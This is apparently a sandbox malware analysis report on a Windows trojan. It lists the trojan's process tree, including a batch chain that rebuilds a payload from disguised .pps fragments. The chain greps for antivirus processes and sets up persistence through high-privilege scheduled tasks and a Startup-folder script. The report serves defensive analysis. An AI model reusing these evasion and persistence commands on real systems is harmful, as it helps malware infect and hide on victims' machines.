                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05A98E1237_2_05A98E12
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05A9493137_2_05A94931
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E347B837_2_05E347B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E381D037_2_05E381D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E3A0B037_2_05E3A0B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E353D037_2_05E353D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E31FC037_2_05E31FC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E381C037_2_05E381C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E3211837_2_05E32118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E3A0A037_2_05E3A0A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E320BC37_2_05E320BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E3603837_2_05E36038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E3232437_2_05E32324
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E3220C37_2_05E3220C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E34B0037_2_05E34B00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E312E837_2_05E312E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E312DB37_2_05E312DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E3BCE737_2_05E3BCE7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E3BCF437_2_05E3BCF4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E3BCF837_2_05E3BCF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05E31FB037_2_05E31FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0631BEB837_2_0631BEB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0631D28837_2_0631D288
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745A74837_2_0745A748
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745DE6637_2_0745DE66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745C30037_2_0745C300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745DA6437_2_0745DA64
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745FA7737_2_0745FA77
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745717337_2_07457173
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745F64837_2_0745F648
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745F61837_2_0745F618
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745FEA737_2_0745FEA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745C57B37_2_0745C57B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745C52037_2_0745C520
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745C58837_2_0745C588
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745CC4737_2_0745CC47
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745DC6E37_2_0745DC6E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745FAE237_2_0745FAE2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745C2F237_2_0745C2F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745A95337_2_0745A953
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745797C37_2_0745797C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745212D37_2_0745212D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_075457E037_2_075457E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754A34037_2_0754A340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754AB2037_2_0754AB20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_07541B8E37_2_07541B8E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_075418E837_2_075418E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_07548FD437_2_07548FD4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754465137_2_07544651
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754EE3037_2_0754EE30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754D64137_2_0754D641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754EE1F37_2_0754EE1F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754EE3037_2_0754EE30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754CCEA37_2_0754CCEA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754AB1037_2_0754AB10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754A33237_2_0754A332
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_07541BD337_2_07541BD3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754A3DC37_2_0754A3DC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754ABBC37_2_0754ABBC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754224037_2_07542240
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754223037_2_07542230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_07541A9A37_2_07541A9A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_075418E837_2_075418E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_075418DA37_2_075418DA
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: String function: 004062A3 appears 58 times
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: String function: 0073FD52 appears 40 times
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: String function: 00740DA0 appears 46 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1144
                  Source: 00000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 00000123.exe
                  Source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 00000123.exe
                  Source: 00000123.exe, 00000000.00000002.2533339208.00000000039CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCdyszieoz.exe" vs 00000123.exe
                  Source: 00000123.exe, 00000000.00000002.2572492480.0000000008420000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 00000123.exe
                  Source: 00000123.exeBinary or memory string: get_DiscardOriginalFilename vs 00000123.exe
                  Source: 00000123.exeBinary or memory string: set_DiscardOriginalFilename vs 00000123.exe
                  Source: 00000123.exeBinary or memory string: IsUseOriginalFilename vs 00000123.exe
                  Source: 00000123.exeBinary or memory string: useOriginalFilename vs 00000123.exe
                  Source: 00000123.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: update.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                  Source: 00000123.exe, -.csCryptographic APIs: 'CreateDecryptor'
                  Source: 00000123.exe, Dnrgnk.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.00000123.exe.717fd00.4.raw.unpack, MISJyPtQaG1dvlqIy9.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.00000123.exe.717fd00.4.raw.unpack, R7pp1CEv5h7lSYql4h.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.00000123.exe.717fd00.4.raw.unpack, R7pp1CEv5h7lSYql4h.csCryptographic APIs: 'CreateDecryptor'
                  Source: 00000123.exe, -.csBase64 encoded string: 'In85VmYXX1QvRG8fEnIjTW1UMHU5R24YHX9xZWYONGg+UHo7AnUvT2EWCD0tR3clN3MmTk0bHGNxTXMlOGgvU3YbHW8+WzgdFHIVbmYUFnIiGUQfBVIzUmY8A2knamIUFWovGWQfBVkEQ24fSk8kRmYCPmBxcGYbFVU+UGoUFj0LRmdBFmM+fVMVAm8+S2wUSmEvVlw5BHQ4R20ONWknQ2oUSlUvVkcbBWdxETRDQT5xY3AJFGsoTnopFHQ8R3FBIm8nUm8fMHU5R24YHX8PWnMWHnQvUDgYEGQvTnUXSnUnTWgfBWM5Vg=='
                  Source: wscript.exe, 0000001A.00000003.2435361451.000001AE7EAE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.2436412064.000001AE7EAE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: teObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\updatte.exe"""e.vbpl;,j
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@60/35@2/1
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007941FA GetLastError,FormatMessageW,28_2_007941FA
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00782010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,28_2_00782010
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00781A0B AdjustTokenPrivileges,CloseHandle,28_2_00781A0B
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,6_2_004044A5
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,28_2_0078DD87
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_004024FB CoCreateInstance,6_2_004024FB
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00793A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,28_2_00793A0E
                  Source: C:\Users\user\Desktop\00000123.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbsJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:64:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\b3fab82944ce6e32
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
                  Source: C:\Users\user\Desktop\00000123.exeFile created: C:\Users\user\AppData\Local\Temp\update.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Expensive.pps Expensive.pps.bat & Expensive.pps.bat
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs"
                  Source: 00000123.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 00000123.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Users\user\Desktop\00000123.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 00000123.exeReversingLabs: Detection: 23%
                  Source: C:\Users\user\Desktop\00000123.exeFile read: C:\Users\user\Desktop\00000123.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\00000123.exe "C:\Users\user\Desktop\00000123.exe"
                  Source: C:\Users\user\Desktop\00000123.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                  Source: C:\Users\user\Desktop\00000123.exeProcess created: C:\Users\user\AppData\Local\Temp\update.exe "C:\Users\user\AppData\Local\Temp\update.exe"
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Expensive.pps Expensive.pps.bat & Expensive.pps.bat
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Expensive.pps Expensive.pps.bat
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 611485
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Experts.pps
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Gd" Investigations
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 611485\Heroes.com + Closely + Sad + Sandwich + Legends + Labor + Mailing + Jersey + Dies + Disabled + Technical 611485\Heroes.com
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Utilize.pps + ..\Expenditure.pps + ..\Hacker.pps + ..\Sexually.pps + ..\Forbes.pps + ..\Taught.pps + ..\Champion.pps + ..\Eclipse.pps + ..\Plants.pps + ..\Ed.pps + ..\Midnight.pps H
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\611485\Heroes.com Heroes.com H
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "GuardianCryptoScan360" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc onlogon /F /RL HIGHEST
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com" "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\U"
                  Source: C:\Users\user\Desktop\00000123.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Users\user\Desktop\00000123.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1144
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  Source: C:\Users\user\Desktop\00000123.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /releaseJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess created: C:\Users\user\AppData\Local\Temp\update.exe "C:\Users\user\AppData\Local\Temp\update.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renewJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Expensive.pps Expensive.pps.bat & Expensive.pps.batJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Expensive.pps Expensive.pps.batJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 611485Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Experts.ppsJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Gd" Investigations Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 611485\Heroes.com + Closely + Sad + Sandwich + Legends + Labor + Mailing + Jersey + Dies + Disabled + Technical 611485\Heroes.comJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Utilize.pps + ..\Expenditure.pps + ..\Hacker.pps + ..\Sexually.pps + ..\Forbes.pps + ..\Taught.pps + ..\Champion.pps + ..\Eclipse.pps + ..\Plants.pps + ..\Ed.pps + ..\Midnight.pps HJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\611485\Heroes.com Heroes.com HJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHESTJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "GuardianCryptoScan360" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc onlogon /F /RL HIGHESTJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com" "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\U"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeSection loaded: userenv.dllJump to behavior
